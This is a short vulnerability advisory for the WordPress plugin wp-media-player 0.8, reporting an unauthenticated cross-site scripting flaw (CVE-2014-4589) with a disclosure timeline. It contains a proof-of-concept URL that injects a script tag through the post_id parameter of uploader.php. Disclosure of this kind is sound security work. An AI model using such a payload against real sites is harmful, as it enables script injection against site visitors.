wp-plugin : wp-media-player

Plugin Details
Plugin Name: wp-plugin : wp-media-player
Effected Version : 0.8 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wpmediaplayer/uploader.php?tab=choose&post_id=tester%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E


Disclosure Timeline
Vendor Contacted : 2014-01-15
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4589
Plugin Description :
[| This plugin allows addition of Silverlight-based media players to WordPress blog posts and pages. The players can be used to play Windows Media Video (WMV) encoded video content. The plugin has the following features: * 6 player styles * Watermark image * Tracking and reporting on how many times the videos have been watched * Default player configuration settings, such as size, thumbnail, auto load and auto play. * Per-instance player configuration settings that can be used to customize each individual player within or across blog posts. * Unlimited number of players within the same blog post or page. * UI for uploading of video files and for inserting media players into blog posts and pages Follow the instructions at [WP Media Player - Video Encoding](http://ruslany.net/wp-media-player/video-encoding/) to encode the video content for the player. The version 0.8 contains several bug fixes and a new feature for adding watermark image in the player. Refer to the [changelog](http://ruslany.net/wp-media-player/changelog/) for more details. For more information, demos and usage instructions refer to [the plugin home page](http://ruslany.net/wp-media-player/). ]